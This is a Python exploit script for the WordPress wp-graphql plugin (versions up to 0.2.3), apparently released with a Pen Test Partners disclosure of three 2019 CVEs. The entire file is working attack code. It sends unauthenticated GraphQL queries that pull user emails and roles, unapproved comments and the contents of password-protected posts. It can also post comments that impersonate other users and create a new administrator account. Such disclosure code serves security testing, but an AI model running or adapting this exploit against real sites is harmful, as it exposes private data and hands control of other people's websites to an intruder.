#!/usr/bin/env python # # Author: Simone Quatrini of Pen Test Partners # CVEs: 2019-9879, 2019-9880, 2019-9881 # Tested on Wordpress 5.1.1 and wp-graphql 0.2.3 # https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/ import argparse import requests import base64 import json import sys parser = argparse.ArgumentParser(description="wp-graphql <= 0.2.3 multi-exploit") parser.add_argument('--url', action='store', dest='url', required=True, help="wp-graphql endpoint. e.g.: http://localhost/wordpress/graphql") parser.add_argument('--post-comment', nargs=3, action='store', metavar=('postid','userid','commenttext'), dest='comment', required=False, help="Post comment impersonating a specific user. e.g.: --post-comment 2 1 Test") parser.add_argument('--register-admin', nargs=3, action='store', metavar=('email','password','username'), dest='register', required=False, help="Register a new admin user. e.g.: --register-admin test@example.com MySecretP@ssword hax0r") parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response") args = parser.parse_args() def show_plugins(url, headers, verbose): payload = {"query":"{plugins{edges{node{name,description,version}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "[+] Installed plugins:" parsed = json.loads(response.text) for i in parsed['data']['plugins']['edges']: print i['node']['name']+" "+i['node']['version'] else: print "\n[-] Error code fetching plugins: ", response.status_code if verbose: print(response.text) def show_themes(url, headers, verbose): payload = {"query":"{themes{edges{node{name,description,version}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "\n[+] Installed themes:" parsed = json.loads(response.text) for i in parsed['data']['themes']['edges']: print i['node']['name']+" "+str(i['node']['version']) else: print "\n[-] Error code fetching themes: ", response.status_code if verbose: print(response.text) def show_medias(url, headers, verbose): payload = {"query":"{mediaItems{edges{node{id,mediaDetails{file,sizes{file,height,mimeType,name,sourceUrl,width}},uri}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "\n[+] Media items:" parsed = json.loads(response.text) for i in parsed['data']['mediaItems']['edges']: print "/wp-content/uploads/"+i['node']['mediaDetails']['file'] else: print "\n[-] Error code fetching media items: ", response.status_code if verbose: print(response.text) def show_users(url, headers, verbose): payload = {"query":"{users{edges{node{firstName,lastName,nickname,roles,email,userId,username}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "\n[+] User list:" parsed = json.loads(response.text) for i in parsed['data']['users']['edges']: print "ID: "+str(i['node']['userId'])+" - Username: "+i['node']['username']+" - Email: "+i['node']['email']+" - Role: "+i['node']['roles'][0] else: print "\n[-] Error code fetching user list: ", response.status_code if verbose: print(response.text) def show_comments(url, headers, verbose): payload = {"query":"{comments(where:{includeUnapproved:[]}){edges{node{id,commentId,approved,content(format:RAW)}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "\n[+] Comments list:" parsed = json.loads(response.text) for i in parsed['data']['comments']['edges']: print "ID: "+str(i['node']['commentId'])+" - Approved: "+str(i['node']['approved'])+" - Text: "+str(i['node']['content']) else: print "\n[-] Error code fetching comments list: ", response.status_code if verbose: print(response.text) def show_password_protected(url, headers, verbose): payload = {"query":"{posts(where:{hasPassword:true}){edges{node{title,id,content(format:RAW)}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "\n[+] Found the following password protected post(s):" parsed = json.loads(response.text) for i in parsed['data']['posts']['edges']: print "ID: "+base64.b64decode(str(i['node']['id']))+" - Title: "+str(i['node']['title'])+" - Content: "+str(i['node']['content']) else: print "\n[-] No password protected post found" if verbose: print(response.text) payload = {"query":"{pages(where:{hasPassword:true}){edges{node{id,link,title,uri,content(format:RAW)}}}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'node' in response.text: print "\n[+] Found the following password protected page(s):" parsed = json.loads(response.text) for i in parsed['data']['pages']['edges']: print "ID: "+base64.b64decode(str(i['node']['id']))+" - Title: "+str(i['node']['title'])+" - Content: "+str(i['node']['content']) else: print "\n[-] No password protected page found" if verbose: print(response.text) def post_comment(url, headers, postID, userID, comment, verbose): payload = {"query":"mutation{createComment(input:{postId:"+postID+",userId:"+userID+",content:\""+comment+"\",clientMutationId:\"UWHATM8\",}){clientMutationId}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'UWHATM8' in response.text: print "[+] Comment posted on article ID "+postID+"" else: print "\n[-] Error posting the comment. Check that postID and userID are correct" if verbose: print(response.text) def register_admin(url, headers, email, password, username, verbose): payload = {"query":"mutation{registerUser(input:{clientMutationId:\"UWHATM8\",email:\""+email+"\",password:\""+password+"\",username:\""+username+"\",roles:[\"administrator\"]}){clientMutationId}}"} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200 and 'UWHATM8' in response.text: print "[+] New admin created. Login with "+username+":"+password else: print "\n[-] Registrations are closed, can't proceed." if verbose: print(response.text) def check_endpoint(url, headers): payload = {'':''} response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200: print "[+] Endpoint is reachable\n" else: print "\n[-] Endpoint response code: ", response.status_code sys.exit() url = args.url headers = {'Content-type': 'application/json', 'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'} verbose = args.verbose # Only in case '--post-comment' is passed if args.comment: postID, userID, comment = args.comment check_endpoint(url, headers) post_comment(url, headers, postID, userID, comment, verbose) sys.exit() # Only in case '--register-admin' is passed if args.register: email, password, username = args.register check_endpoint(url, headers) register_admin(url, headers, email, password, username, verbose) sys.exit() # Default actions if only '--url' is passed show_plugins(url, headers, verbose) show_themes(url, headers, verbose) show_medias(url, headers, verbose) show_users(url, headers, verbose) show_comments(url, headers, verbose) show_password_protected(url, headers, verbose)